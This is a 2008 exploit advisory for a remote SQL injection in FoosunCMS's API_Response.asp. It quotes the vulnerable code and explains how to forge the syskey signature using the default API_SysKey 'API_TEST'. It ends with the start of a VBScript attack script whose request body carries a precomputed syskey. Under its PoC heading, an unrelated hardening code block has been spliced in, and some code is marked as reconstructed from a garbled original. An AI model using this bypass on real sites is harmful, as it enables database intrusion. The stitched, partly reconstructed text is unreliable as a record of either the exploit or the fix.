FoosunCMS Sql Injection Vulnerability
Published: 07/08/2008
--==+=================== www.nspcn.org =================+==--
--==+ FoosunCMS (API_Response.asp) Remote SQL Injection Exploit +==--
--==+===================================================+==--

# Author: Tr4c3[at]126[dot]com
# Copyright: http://www.nspcn.org & [BK instantaneous group]
# Vulnerable file: API/API_Response.asp
# Affected version: v4.0 SP5 [other versions not checked]

# Cause of the vulnerability:
The value of the variable username is placed into the SQL statement without any filtering, so the statement is executed with attacker-controlled content, which results in SQL injection.
# Key code:

If CheckPost() Then
    Select Case Act
        Case "checkname"   ' the injection is triggered here
            Checkname()

The CheckPost() function is defined at lines 73-96 of the file; username takes its value from there, as follows:

XmlDoc.documentElement.selectSingleNode("username")

The Checkname() function is at lines 233-254; the code is as follows:

Sub Checkname()
    Dim UserEmail
    Dim Temp_tr, i, Rs, Sql
    UserEmail = Trim(XmlDoc.documentElement.selectSingleNode("email").text)
    If Messenge <> "" Then
        ' output the error message
        Status = 1
        Exit Sub
    End If
    ' UserName is concatenated into the query unescaped; the SQL is executed right here
    ' (quoting of the literal reconstructed from the garbled original)
    Sql = "Select UserName, Email From FS_ME_Users Where UserName='" & UserName & "'"
    Set Rs = User_Conn.Execute(Sql)
    If Not Rs.Eof And Not Rs.Bof Then
        Messenge = "you fill in user already registered."
        Status = 1
        Exit Sub
    Else
        Status = 0
        Messenge = "the confirmation passes."
    End If
    Rs.Close
    Set Rs = Nothing
End Sub

The key to reaching this code is making CheckPost() return True; the relevant code is as follows:

Dim NewMd5, OldMd5
NewMd5 = Md5(UserName & API_SysKey, 16)
OldMd5 = Md5(UserName & API_SysKey, 16)

If Syskey = NewMd5 Or Syskey = OldMd5 Then
    CheckPost = True
Else
    Status = 1
    Messenge = Messenge & "<li>The request data failed verification, please contact the administrator."
End If

API_SysKey is defined at line 16 of Api_Config.asp:

Const API_SysKey = "API_TEST"

So the request passes the check as long as syskey is set to the 16-character MD5 hash of the injected username string concatenated with API_SysKey.
# PoC:
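As an added example (not code from this advisory or from FoosunCMS), here is a hardened Checkname() for classic ASP/VBScript: it whitelists the user name and binds it as an ADODB parameter instead of concatenating it, and it shows a startup check for Api_Config.asp that refuses the shipped default API_SysKey, since the syskey signature is only as secret as that constant. The globals XmlDoc, User_Conn, UserName, Messenge and Status are assumed to exist as in the original file; the user-name pattern and the column width are assumptions.

```vbscript
' Added hardening example (not FoosunCMS code). Assumes the globals used by the
' original API_Response.asp: XmlDoc, User_Conn, UserName, Messenge, Status.
Sub Checkname()
    Dim UserEmail, Re, Cmd, Rs
    UserEmail = Trim(XmlDoc.documentElement.selectSingleNode("email").text)
    If Messenge <> "" Then
        Status = 1
        Exit Sub
    End If

    ' 1. Whitelist the user name before it gets anywhere near SQL.
    '    The pattern is an assumption; adjust it to the site's real user-name policy.
    Set Re = New RegExp
    Re.Pattern = "^[A-Za-z0-9_]{1,20}$"
    If Not Re.Test(UserName) Then
        Status = 1
        Messenge = "Invalid user name."
        Exit Sub
    End If

    ' 2. Bind the value as a parameter: the driver sends it as data,
    '    so quotes or keywords inside it can never change the statement.
    Set Cmd = Server.CreateObject("ADODB.Command")
    Set Cmd.ActiveConnection = User_Conn
    Cmd.CommandType = 1   ' adCmdText
    Cmd.CommandText = "Select UserName, Email From FS_ME_Users Where UserName = ?"
    ' 200 = adVarChar, 1 = adParamInput, 50 = assumed column width
    Cmd.Parameters.Append Cmd.CreateParameter("@UserName", 200, 1, 50, UserName)
    Set Rs = Cmd.Execute

    If Not Rs.EOF Then
        Status = 1
        Messenge = "you fill in user already registered."
    Else
        Status = 0
        Messenge = "the confirmation passes."
    End If
    Rs.Close
    Set Rs = Nothing
    Set Cmd = Nothing
End Sub

' 3. In Api_Config.asp: refuse to serve requests while the shipped default key
'    is still in place, so the syskey signature cannot be forged from a known value.
Const API_SysKey = "CHANGE-ME-TO-A-LONG-RANDOM-VALUE"   ' placeholder, not a real key
If API_SysKey = "API_TEST" Or Len(API_SysKey) < 16 Then
    Response.Write "API_SysKey is still the default; refusing requests."
    Response.End
End If
```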

Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Rem Foosun 4.0 SP5 [MSSQL] injection vulnerability test script By Tr4c3[at]126[dot]com
Rem For more information see:
Rem Network security front http://www.nspcn.org/
Rem Web security handbook http://www.tr4c3.com/
Rem BK instantaneous [QQ group]
Rem Please keep the above copyright notice when reposting
Dim strData, strUrl, strGetinfo, xPost
strData = "<body><userip>999.999.999.999</userip><email>body@baidu.com</email><action>checkname</action>" & _
          "<syskey>b77c8e0d7a0784d5</syskey><appid>FoosunCMS</appid><username></username></body>"
